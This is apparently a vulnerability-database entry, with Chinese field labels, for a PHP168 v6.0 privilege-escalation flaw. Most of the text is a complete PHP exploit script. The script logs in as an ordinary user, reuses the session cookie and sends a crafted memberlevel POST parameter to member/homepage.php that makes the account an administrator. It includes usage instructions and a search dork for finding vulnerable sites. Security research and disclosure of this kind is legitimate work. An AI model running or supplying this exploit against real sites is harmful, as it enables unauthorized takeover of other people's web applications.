Php168 v6 权限提升漏洞

基本字段

漏洞编号：: SSV-11836

披露/发现时间：: 未知

提交时间：: 2009-07-18

漏洞等级：

漏洞类别：: 越权访问

影响组件：: PHP168

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.2KB

#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Php168 v6.0 update user access exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PHP168 V6.0" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 5) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user pass host: target server (ip/hostname) path: path to php168 user: login username pass: login password Example: php '.$argv[0].' localhost /php168/ ryat 123456 +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; $resp = send(); preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie); if ($cookie) if (strpos(send(), 'puret_t') !== false) exit("Expoilt Success!\nYou Are Admin Now!\n"); else exit("Exploit Failed!\n"); else exit("Exploit Failed!\n"); function rands($length = 8) { $hash = ''; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; mt_srand((double)microtime() * 1000000); for ($i = 0; $i < $length; $i++) $hash .= $chars[mt_rand(0, $max)]; return $hash; } function send() { global $host, $path, $user, $pass, $cookie; if ($cookie) { $cookie[1] .= ';USR='.rands()."\t31\t\t"; $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1'; $message = "POST ".$path."member/homepage.php?uid=$cookie[2] HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n"; $message .= "Cookie: ".$cookie[1]."\r\n\r\n"; $message .= $cmd; } else { $cmd = "username=$user&password=$pass&step=2"; $message = "POST ".$path."do/login.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; } $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>